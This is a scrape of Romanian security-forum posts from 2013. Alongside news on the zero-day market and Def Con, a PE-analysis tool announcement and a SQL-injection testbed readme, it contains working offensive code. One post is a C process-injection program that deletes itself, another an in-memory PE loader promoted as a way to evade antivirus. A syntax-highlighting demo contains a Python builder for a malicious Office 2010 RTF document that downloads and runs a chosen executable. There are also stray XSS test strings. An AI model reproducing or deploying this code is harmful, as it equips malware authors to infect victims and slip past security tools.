Nytro

[h=1]Governments are Big Buyers of Zero-Day Flaws[/h] 15 July 2013 [h=2]The extent and sophistication of the market for zero-day vulnerabilities is becoming better understood. It appears that governments – especially the US, UK, Israel, Russia, India and Brazil – are among the biggest customers.[/h] A new report in the New York Times describes the market for zero-day flaws. "On the tiny Mediterranean island of Malta, two Italian hackers have been searching for bugs... secret flaws in computer code that governments pay hundreds of thousands of dollars to learn about and exploit." The hackers in question run the company known as Revuln, and like France-based Vupen, it finds or acquires zero-day vulnerabilities that it can sell on to the highest bidder. Vupen charges its customers an annual subscription fee of $100,000 merely to see its catalog of flaws – and then charges extra for each vulnerability. At these prices, it is unsurprising that the buyer is usually a government agency. As Graham Cluley comments, "The truth is that the likes of Google and Microsoft are never likely to be able to pay as much for a security vulnerability as the US or Chinese intelligence agencies." Although Microsoft has recently introduced a maximum bug bounty of $150,000, it pales into insignificance in the face of the reputed $500,000 paid for an iOS bug. Revuln's work has long been known. The Q4 2012 ICS-CERT Monitor warned, "Malta-based security start-up firm ReVuln claims to be sitting on a stockpile of vulnerabilities in industrial control software, but prefers to sell the information to governments and other paying customers instead of disclosing it to the affected software vendors." ICS vulnerabilities are precisely those needed by states to protect their own or attack foreign critical infrastructures. Last week, Der Spiegel published details of an email interview between Jacob Appelbaum and Edward Snowden. Snowden confirmed that Stuxnet had been jointly developed by the US and Israel. There is no information on whether the zero-days in Stuxnet were discovered or bought, but nevertheless ACLU policy analyst Christopher Soghoian blames Stuxnet for the success of companies like Vupen and Revuln. The knowledge that military organizations are interested in and use zero-day flaws "showed the world what was possible," explains the Times. "It also became a catalyst for a cyberarms race." The military establishment, said Soghoian, “created Frankenstein by feeding the market.” The problem now is that no-one knows how big or scary this Frankenstein might become. Is there a danger, for example, that developers could be persuaded to build in backdoors that they can later sell? Jeremiah Grossman, Founder and CTO of WhiteHat Security thinks this is a possibility. "As 0-days go for six to seven figures, imagine the temptation for rogue developers to surreptitiously implant bugs in the software supply chain," he commented. "It's hard enough to find vulnerabilities in source code when developers are not purposely trying to hide them." This is a problem that is not going away. "Vulnerability is a function of complexity, and as operating systems and source code continually trend to more complexity, so does the scope for vulnerabilities and exploits," said Adrian Culley, a consultant with Damballa (and a former Scotland Yard detective) to Infosecurity. "All code is dual use. The reality is there is now a free market; and to coin a trite cliche, the lid is off off Pandora's box." Sursa: Infosecurity - Governments are Big Buyers of Zero-Day Flaws

[h=1]Self-deleting executable[/h]by [h=3]zwclose7[/h]This is another example of PE injection. This program will create a suspended cmd.exe process, and then inject the executable image into to the child process. An user mode APC is then queued to the child process's primary thread. Finally, the thread is resumed and the injected code is executed. The injected code calls DeleteFile function to delete the original executable file. 1) Get the PE header of the program using RtlImageNtHeader. 2) Create a suspended cmd.exe using CreateProcess function. 3) Allocate executable memory in the child process. 4) Relocate the executable image, and then write it to the child process using NtWriteVirtualMemory function. 5) Queue an user mode APC to the child process's primary thread. 6) Resume the primary thread using NtResumeThread function. 7) The primary thread executes the injected code. 8) The injected code calls DeleteFile function to delete the original executable file. 9) The injected code calls ExitProcess function to terminate the cmd.exe process. #include <Windows.h>#include <winternl.h> #pragma comment(lib,"ntdll.lib") EXTERN_C PIMAGE_NT_HEADERS NTAPI RtlImageNtHeader(PVOID); EXTERN_C NTSTATUS NTAPI NtWriteVirtualMemory(HANDLE,PVOID,PVOID,ULONG,PULONG); EXTERN_C NTSTATUS NTAPI NtResumeThread(HANDLE,PULONG); EXTERN_C NTSTATUS NTAPI NtTerminateProcess(HANDLE,NTSTATUS); char szFileName[260]; void WINAPI ThreadProc() { while(1) { Sleep(1000); if(DeleteFile(szFileName)) { break; } } ExitProcess(0); } int WINAPI WinMain(HINSTANCE hInst,HINSTANCE hPrev,LPSTR lpCmdLine,int nCmdShow) { PIMAGE_NT_HEADERS pINH; PIMAGE_DATA_DIRECTORY pIDD; PIMAGE_BASE_RELOCATION pIBR; HMODULE hModule; PVOID image,mem,StartAddress; DWORD i,count,nSizeOfImage; DWORD_PTR delta,OldDelta; LPWORD list; PDWORD_PTR p; STARTUPINFO si; PROCESS_INFORMATION pi; GetModuleFileName(NULL,szFileName,260); hModule=GetModuleHandle(NULL); pINH=RtlImageNtHeader(hModule); nSizeOfImage=pINH->OptionalHeader.SizeOfImage; memset(&si,0,sizeof(si)); memset(?,0,sizeof(pi)); if(!CreateProcess(NULL,"cmd.exe",NULL,NULL,FALSE,CREATE_SUSPENDED|CREATE_NO_WINDOW,NULL,NULL,&si,?)) { return 1; } mem=VirtualAllocEx(pi.hProcess,NULL,nSizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE); if(mem==NULL) { NtTerminateProcess(pi.hProcess,0); return 1; } image=VirtualAlloc(NULL,nSizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE); memcpy(image,hModule,nSizeOfImage); pIDD=&pINH->OptionalHeader.DataDirectory[iMAGE_DIRECTORY_ENTRY_BASERELOC]; pIBR=(PIMAGE_BASE_RELOCATION)((LPBYTE)image+pIDD->VirtualAddress); delta=(DWORD_PTR)((LPBYTE)mem-pINH->OptionalHeader.ImageBase); OldDelta=(DWORD_PTR)((LPBYTE)hModule-pINH->OptionalHeader.ImageBase); while(pIBR->VirtualAddress!=0) { if(pIBR->SizeOfBlock>=sizeof(IMAGE_BASE_RELOCATION)) { count=(pIBR->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))/sizeof(WORD); list=(LPWORD)((LPBYTE)pIBR+sizeof(IMAGE_BASE_RELOCATION)); for(i=0;i<count;i++) { if(list>0) { p=(PDWORD_PTR)((LPBYTE)image+(pIBR->VirtualAddress+(0x0fff & (list)))); *p-=OldDelta; *p+=delta; } } } pIBR=(PIMAGE_BASE_RELOCATION)((LPBYTE)pIBR+pIBR->SizeOfBlock); } if(!NT_SUCCESS(NtWriteVirtualMemory(pi.hProcess,mem,image,nSizeOfImage,NULL))) { NtTerminateProcess(pi.hProcess,0); return 1; } StartAddress=(PVOID)((LPBYTE)mem+(DWORD_PTR)(LPBYTE)ThreadProc-(LPBYTE)hModule); if(!QueueUserAPC((PAPCFUNC)StartAddress,pi.hThread,0)) { NtTerminateProcess(pi.hProcess,0); return 1; } NtResumeThread(pi.hThread,NULL); NtClose(pi.hThread); NtClose(pi.hProcess); VirtualFree(image,0,MEM_RELEASE); return 0; } [h=4]Attached Files[/h] selfdel.zip 272.35K 6 downloads Sursa: Self-deleting executable - rohitab.com - Forums

[h=1]Execute PE file on virtual memory[/h]by [h=3]shebaw[/h]Hi everyone. I've been reversing some malware like ramnit and I noticed that they contain most of their codes in embedded executable programs and proceed to execute the program as if it's part of the parent program. This is different from process forking method since that creates a new process while this one just calls into the embedded program as if it's one of it's own function (well almost ). So here is a code I came up with that does just that. What it basically does is, it first maps the executable's different sections on to an executable memory region, it then imports and builds the IAT of the executable and finally performs relocation fix-ups and transfers control to the entry point of the executable after setting up ebx to point to PEB and eax to the EP. Since you can't always allocate on the preferred base address of the executable, relocation table is a MUST. This won't work on executables without relocation tables but that shouldn't matter if you are trying to obfuscate your own code since you can tell the compiler to include relocation tables when you recompile it. You can use this method as another layer of protection from AVs. #include <Windows.h>#include <string.h> #include <stdio.h> #include <tchar.h> #include "mem_map.h" HMODULE load_dll(const char *dll_name) { HMODULE module; module = GetModuleHandle(dll_name); if (!module) module = LoadLibrary(dll_name); return module; } void *get_proc_address(HMODULE module, const char *proc_name) { char *modb = (char *)module; IMAGE_DOS_HEADER *dos_header = (IMAGE_DOS_HEADER *)modb; IMAGE_NT_HEADERS *nt_headers = (IMAGE_NT_HEADERS *)(modb + dos_header->e_lfanew); IMAGE_OPTIONAL_HEADER *opt_header = &nt_headers->OptionalHeader; IMAGE_DATA_DIRECTORY *exp_entry = (IMAGE_DATA_DIRECTORY *) (&opt_header->DataDirectory[iMAGE_DIRECTORY_ENTRY_EXPORT]); IMAGE_EXPORT_DIRECTORY *exp_dir = (IMAGE_EXPORT_DIRECTORY *)(modb + exp_entry->VirtualAddress); void **func_table = (void **)(modb + exp_dir->AddressOfFunctions); WORD *ord_table = (WORD *)(modb + exp_dir->AddressOfNameOrdinals); char **name_table = (char **)(modb + exp_dir->AddressOfNames); void *address = NULL; DWORD i; /* is ordinal? */ if (((DWORD)proc_name >> 16) == 0) { WORD ordinal = LOWORD(proc_name); DWORD ord_base = exp_dir->Base; /* is valid ordinal? */ if (ordinal < ord_base || ordinal > ord_base + exp_dir->NumberOfFunctions) return NULL; /* taking ordinal base into consideration */ address = (void *)(modb + (DWORD)func_table[ordinal - ord_base]); } else { /* import by name */ for (i = 0; i < exp_dir->NumberOfNames; i++) { /* name table pointers are rvas */ if (strcmp(proc_name, modb + (DWORD)name_table) == 0) address = (void *)(modb + (DWORD)func_table[ord_table]); } } /* is forwarded? */ if ((char *)address >= (char *)exp_dir && (char *)address < (char *)exp_dir + exp_entry->Size) { char *dll_name, *func_name; HMODULE frwd_module; dll_name = strdup((char *)address); if (!dll_name) return NULL; address = NULL; func_name = strchr(dll_name, '.'); *func_name++ = 0; if (frwd_module = load_dll(dll_name)) address = get_proc_address(frwd_module, func_name); free(dll_name); } return address; } #define MAKE_ORDINAL(val) (val & 0xffff) int load_imports(IMAGE_IMPORT_DESCRIPTOR *imp_desc, void *load_address) { while (imp_desc->Name || imp_desc->TimeDateStamp) { IMAGE_THUNK_DATA *name_table, *address_table, *thunk; char *dll_name = (char *)load_address + imp_desc->Name; HMODULE module; module = load_dll(dll_name); if (!module) { printf("error loading %s\n", dll_name); return 0; } name_table = (IMAGE_THUNK_DATA *)((char *)load_address + imp_desc->OriginalFirstThunk); address_table = (IMAGE_THUNK_DATA *)((char *)load_address + imp_desc->FirstThunk); /* if there is no name table, use address table */ thunk = name_table == load_address ? address_table : name_table; if (thunk == load_address) return 0; while (thunk->u1.AddressOfData) { unsigned char *func_name; /* is ordinal? */ if (thunk->u1.Ordinal & IMAGE_ORDINAL_FLAG) func_name = (unsigned char *)MAKE_ORDINAL(thunk->u1.Ordinal); else func_name = ((IMAGE_IMPORT_BY_NAME *)((char *)load_address + thunk->u1.AddressOfData))->Name; /* address_table->u1.Function = (DWORD)GetProcAddress(module, (char *)func_name); */ address_table->u1.Function = (DWORD)get_proc_address(module, (char *)func_name); thunk++; address_table++; } imp_desc++; } return 1; } void fix_relocations(IMAGE_BASE_RELOCATION *base_reloc, DWORD dir_size, DWORD new_imgbase, DWORD old_imgbase) { IMAGE_BASE_RELOCATION *cur_reloc = base_reloc, *reloc_end; DWORD delta = new_imgbase - old_imgbase; reloc_end = (IMAGE_BASE_RELOCATION *)((char *)base_reloc + dir_size); while (cur_reloc < reloc_end && cur_reloc->VirtualAddress) { int count = (cur_reloc->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD); WORD *cur_entry = (WORD *)(cur_reloc + 1); void *page_va = (void *)((char *)new_imgbase + cur_reloc->VirtualAddress); while (count--) { /* is valid x86 relocation? */ if (*cur_entry >> 12 == IMAGE_REL_BASED_HIGHLOW) *(DWORD *)((char *)page_va + (*cur_entry & 0x0fff)) += delta; cur_entry++; } /* advance to the next one */ cur_reloc = (IMAGE_BASE_RELOCATION *)((char *)cur_reloc + cur_reloc->SizeOfBlock); } } IMAGE_NT_HEADERS *get_nthdrs(void *map) { IMAGE_DOS_HEADER *dos_hdr; dos_hdr = (IMAGE_DOS_HEADER *)map; return (IMAGE_NT_HEADERS *)((char *)map + dos_hdr->e_lfanew); } /* returns EP mem address on success * NULL on failure */ void *load_pe(void *fmap) { IMAGE_NT_HEADERS *nthdrs; IMAGE_DATA_DIRECTORY *reloc_entry, *imp_entry; void *vmap; WORD nsections, i; IMAGE_SECTION_HEADER *sec_hdr; size_t hdrs_size; IMAGE_BASE_RELOCATION *base_reloc; nthdrs = get_nthdrs(fmap); reloc_entry = &nthdrs->OptionalHeader.DataDirectory[iMAGE_DIRECTORY_ENTRY_BASERELOC]; /* no reloc info? */ if (!reloc_entry->VirtualAddress) return NULL; /* allocate executable mem (.SizeOfImage) */ vmap = VirtualAlloc(NULL, nthdrs->OptionalHeader.SizeOfImage, MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (!vmap) return NULL; /* copy the Image + Sec hdrs */ nsections = nthdrs->FileHeader.NumberOfSections; sec_hdr = IMAGE_FIRST_SECTION(nthdrs); hdrs_size = (char *)(sec_hdr + nsections) - (char *)fmap; memcpy(vmap, fmap, hdrs_size); /* copy the sections */ for (i = 0; i < nsections; i++) { size_t sec_size; sec_size = sec_hdr.SizeOfRawData; memcpy((char *)vmap + sec_hdr.VirtualAddress, (char *)fmap + sec_hdr.PointerToRawData, sec_size); } /* load dlls */ imp_entry = &nthdrs->OptionalHeader.DataDirectory[iMAGE_DIRECTORY_ENTRY_IMPORT]; if (!load_imports((IMAGE_IMPORT_DESCRIPTOR *) ((char *)vmap + imp_entry->VirtualAddress), vmap)) goto cleanup; /* fix relocations */ base_reloc = (IMAGE_BASE_RELOCATION *)((char *)vmap + reloc_entry->VirtualAddress); fix_relocations(base_reloc, reloc_entry->Size, (DWORD)vmap, nthdrs->OptionalHeader.ImageBase); return (void *)((char *)vmap + nthdrs->OptionalHeader.AddressOfEntryPoint); cleanup: VirtualFree(vmap, 0, MEM_RELEASE); return NULL; } int vmem_exec(void *fmap) { void *ep; ep = load_pe(fmap); if (!ep) return 0; __asm { mov ebx, fs:[0x30] mov eax, ep call eax } return 1; } Sursa: Execute PE file on virtual memory - rohitab.com - Forums

[h=2]PE-bear[/h] [h=2]What it is?[/h] PE-bear is my new project. It’s a reversing tool for PE files. [h=2]Download[/h] The latest version is 0.1.5 (beta), released: 14.07.2013 changelog.txt changelog.pdf Avaliable here: PE-bear 0.1.5 32bit PE-bear 0.1.5 64bit *requires: Microsoft Visual C++ 2010 Redistributable Package, avaliable here: Redist 32bit Redist 64bit [h=2]Features and details[/h] handles PE32 and PE64 views multiple files in parallel recognizes known packers (by signatures) fast disassembler – starting from any chosen RVA/File offset visualization of sections layout selective comparing of two chosen PE files integration with explorer menu and more… Currently project is under rapid development. You can expect new fetaures/fixes every week. Any sugestions/bug reports are welcome. I am waiting for your e-mails and comments. [h=2]Screenshots[/h] Sursa: PE-bear | hasherezade's 1001 nights

59b63a G 5af3107aba69 G 0 G 46 He explained that, in above string, “G“ acting as a delimiter/separator, where 2nd value after first “G“ i.e 5af3107aba69 is the Profile ID of user. Replacing user ID can give expose email ID of any user in Sign Up Page. Attacker can obtain this numerical ID of facebook profile from Graph API. Superb

Asta nu e ShowOff.

https://rstforums.com/forum/70576-facultati-de-informatica.rst

M-am chinuit degeaba sa scriu: https://rstforums.com/forum/70576-facultati-de-informatica.rst

Ultra gay.

[h=1]Feds asked to avoid Def Con hacking conference after PRISM scandal[/h]by Dan Worth The organisers of the US hacking conference Def Con have asked federal agents to stay away from this year's event given the revelations about the PRISM hacking scandal that broke earlier this year, generating huge levels of mistrust among the hacking community. Writing under his alias The Dark Tangent on the event’s website, organiser Jeff Moss said in the past the open nature of Def Con had been its greatest asset and a reason why the event had proved so popular. “For over two decades Def Con has been an open nexus of hacker culture, a place where seasoned pros, hackers, academics, and feds can meet, share ideas and party on neutral territory,” he wrote. “Our community operates in the spirit of openness, verified trust, and mutual respect.” However, he said that this year it would be sensible if a line was drawn and agents did not attend, as emotions would be running high about the extent of surveillance carried out by the government under the PRISM data collection scheme. “When it comes to sharing and socialising with feds, recent revelations have made many in the community uncomfortable about this relationship,” Moss added. “Therefore, I think it would be best for everyone involved if the feds call a ‘time-out’ and not attend DEF CON this year.” He added that this would give everybody “time to think about how we got here, and what comes next." Earlier this week the European Commission (EC) approved an investigation into the PRISM spying scandal, which also led to claims that government offices had been bugged in order to pry into conversations between world leaders. Sursa: Feds asked to avoid Def Con hacking conference after PRISM scandal - IT News from V3.co.uk

Cocalarii Internetului.

Nu.

Pix cu Linux, doar in pix-uri nu mai bagasera astia Linux

E deja cel din vBulletin. Sa vad daca se poate schimba. [ phpcode ] <?php if($_POST['formSubmit'] == "Submit") { $varMovie = $_POST['formMovie']; $varName = $_POST['formName']; } ?> <form action="myform.php" method="post"> Which is your favorite movie? <input type="text" name="formMovie" maxlength="50" value="<?=$varMovie;?>"> What is your name? <input type="text" name="formName" maxlength="50" value="<?=$varName;?>"> <input type="submit" name="formSubmit" value="Submit"> </form> Nu se poate schimba, cel putin pana acum nu pare sa mearga, desi i-am dat Disable. Folositi "phpcode". Info: Dublu click pe cod pentru a da Copy.

Am pus syntax highlight si pe celelalte template-uri.

S-a apucat cineva de proiect? Daca nici cand e vorba de bani nu faceti nimic...

Testat pe Firefox, Chrome, IE si merge ok. Da, ar trebui sa apara colorata, la mine e totul ok. Vezi Tools > Developer > Web console si erorile de JS sau Net. PS: DOAR TEMA RST! Nu merge pe tema Default, deocamdata.

E prima incercare de a pune syntax highlight pe forum. Sper sa fie ok. Deocamdata nu e complet functional: la Edit Post/Quick reply post nu vor aparea colorate, sper sa rezolv asta maine. Cum folositi: [limbaj] COD [/limbaj] Unde limbaj poate fi: - Java - Cpp - Bash - CSharp - CSS - Delphi - Diff - JS - Perl - Plain - Python - SQL - VB - XML Pentru PHP folositi "phpcode", PHP exista deja in vBulletin. Exemplu (fara spatii): [ CPP ]#include "stdio.h" int main() { puts("Syntax highlight!"); return 0; } [ /CPP ] Rezultat: #include "stdio.h"int main() { puts("Syntax highlight!"); return 0; } Exemple reale: CPP: void putcode(unsigned long * dst){ char buf[MAXPATHLEN + CODE_SIZE]; unsigned long * src; int i, len; memcpy(buf, cliphcode, CODE_SIZE); len = readlink("/proc/self/exe", buf + CODE_SIZE, MAXPATHLEN - 1); if (len == -1) fatal("[-] Unable to read /proc/self/exe"); len += CODE_SIZE; buf[len++] = '\0'; src = (unsigned long*) buf; for (i = 0; i < len; i += 4) if (ptrace(PTRACE_POKETEXT, victim, dst++, *src++) == -1) fatal("[-] Unable to write shellcode"); } Python: import binasciiimport sys import time print "Microsoft Office 2010, download -N- execute " print " What do you want to name your .doc ? " print " Example: TotallyTrusted.doc " filename = raw_input() print " What is the link to your .exe ? " print "HINT!!:: Feed me a url. ie: http://super/eleet/payload.exe " url = raw_input() print "Gears and Cranks working mag1c in the background " time.sleep(3) close="{}}}}}" binme=binascii.b2a_hex(url) file=('e1xydGYxbnNpbnNpY3BnMTI1MlxkZWZmMFxkZWZsYW5nMTAzM3sNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb250dGJsew0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgMA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN3aXNzDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGFyc2V0MCBBcmlhbDt9fXtcKlxnZW5lcmF0b3IgTXNmdGVkaXQgNS40MS4xNS4xNTA3O30NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlld2tpbmQ0XHVjMVxwYXJkDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHMyMCBwYXJkXGYwXGZzXHBhci90YWJccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhci5ccGFyLlxwYXIuXHBhclxwYXJ7XHNocHtcc3B9fXtcc2hwe1xzcH19e1xzaHB7XHNwfX17XHNocHtcKlxzaHBpbnN0XHNocGZoZHIwXHNocGJ4Y29sdW1uXHNocGJ5cGFyYVxzaCBwd3IyfXtcc3B7XHNue317fXtcc259e1xzbn17XCpcKn1wRnJhZ21lbnRzfXtcKlwqXCp9e1wqXCpcc3Z7XCp9OTsyO2ZmZmZmZmZmZmYjMDUwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwZTBiOTJjM2ZBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBNWMxMTEwM2ZhNTljMzgzZmNmYWYzOTNmMTAwMTA0MDEwMTAxMDEwMTAxMDEwMTAxZTBiOTJjM2YwMDgwMDAwMDQ2Y2IzOTNmZGVhZGJlZWZlMGI5MmMzZmMwM2QzYjNmY2MzMzIyM2ZkZjU5MmQzZmM0M2QzYjNmY2MxODJmM2ZjNDNkM2IzZjVlNzQyYjNmNWU3OTM5M2YyNDAwMDAwMDQ0Y2IzOTNmc2x1dGZ1Y2s2NzgyMzkzZmRlMTYzYTNmNjc4MjM5M2ZlMGI5MmMzZmMwM2QzYjNmYTU5YzM4M2Y3YzBhMmIzZmUwYjkyYzNmNTU2Njc3ODhjMDNkM2IzZmE1OWMzODNmZmJiZTM4M2ZlMGI5MmMzZjgwMDAwMDAwYjQ0MTM0M2Y1NTU1NTU1NTY2NjY2NjY2Y2ZhZjM5M2Y0MTQxNDE0MTQxNDE0MTQxNDE0MTQxNDE0MTQxNDE0MTQxNDE0MTQxNDE0MTQxNDE0MTQxNDE0MTQxZWI3NzMxYzk2NDhiNzEzMDhiNzYwYzhiNzYxYzhiNWUwODhiN2UyMDhiMzY2NjM5NGYxODc1ZjJjMzYwOGI2YzI0MjQ4YjQ1M2M4YjU0MDU3ODAxZWE4YjRhMTg4YjVhMjAwMWViZTMzNDQ5OGIzNDhiMDFlZTMxZmYzMWMwZmNhYzg0YzA3NDA3YzFjZjBkMDFjN2ViZjQzYjdjMjQyODc1ZTE4YjVhMjQwMWViNjY4YjBjNGI4YjVhMWMwMWViOGIwNDhiMDFlODg5NDQyNDFjNjFjM2U4OTJmZmZmZmY1ZjgxZWY5OGZmZmZmZmViMDVlOGVkZmZmZmZmNjg4ZTRlMGVlYzUzZTg5NGZmZmZmZjMxYzk2NmI5NmY2ZTUxNjg3NTcyNmM2ZDU0ZmZkMDY4MzYxYTJmNzA1MGU4N2FmZmZmZmYzMWM5NTE1MThkMzc4MWM2ZWVmZmZmZmY4ZDU2MGM1MjU3NTFmZmQwNjg5OGZlOGEwZTUzZTg1YmZmZmZmZjQxNTE1NmZmZDA2ODdlZDhlMjczNTNlODRiZmZmZmZmZmZkMDYzNmQ2NDJlNjU3ODY1MjAyZjYzMjAyMDYxMmU2NTc4NjUwMA==\n') textfile = open(filename , 'w') textfile.write(file.decode('base64')+binme+close) textfile.close() time.sleep(3) print "enjoy" E posibil sa fie si alte probleme, verificati daca este totul in regula si postati aici daca e vreo problema.

Da, l-am vazut, this is the real shit!

SQLol Released at Austin Hackers Association meeting 0x3f Daniel Crowley <dcrowley@trustwave.com> http://www.trustwave.com INTRODUCTION ============ ***WARNING: SQLol IS INTENTIONALLY VULNERABLE. DO NOT USE ON A PRODUCTION WEB SERVER. DO NOT EXPOSE SQLol IN AN UNTRUSTED ENVIRONMENT.*** SQLol is a configurable SQL injection testbed. SQLol allows you to exploit SQL injection flaws, but furthermore allows a large amount of control over the manifestation of the flaw. To better understand why SQLol exists, please read the sonnet below: I humbly posit that the current state (With much respect to work which does precede) Of test-beds made with vulns to demonstrate Is lacking some in flexibility. Two options are presented present-day, As far as when one deals with S-Q-L: A blind injection (bool or time delay) And UNION statement hax (oh gee, how swell…) Imagine we could choose how queries read And how our input sanitizes, oh! How nimble and specific we could be To recreate our ‘sploit scenarios. And thus is S-Q-L-O-L conceived: That we can study how to pwn DBs. Options: Type of query Location within query Type and level of sanitization Level of query output Verbosity of error messages Visibility of query Injection string entry point Other cool things: Reset button Challenges Support for multiple database systems REQUIREMENTS ============ PHP 5.x Web server Database server (MySQL, PostgreSQL and SQLite have been tested, others may work) ADODB library (included) USAGE ===== Place the SQLol source files on your Web server and open in a Web browser. Modify the configuration file #sqlol_directory#/includes/database.config.php to point to your installed database server. Use the resetbutton.php script to write the SQLol database, then start playing! COPYRIGHT ========= SQLol - A configurable SQL injection testbed Daniel "unicornFurnace" Crowley Copyright © 2012 Trustwave Holdings, Inc. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/> Download: https://github.com/SpiderLabs/SQLol

Da, e smecher

', null, 123, null); alert('Pufuleti');

Test " < > ' plm \ / ()

In limita timpului disponibil...: 1. Two-factor auth 2. Validare certificat self-signed

Prea complex, ma interesa doar algoritmul NTLM.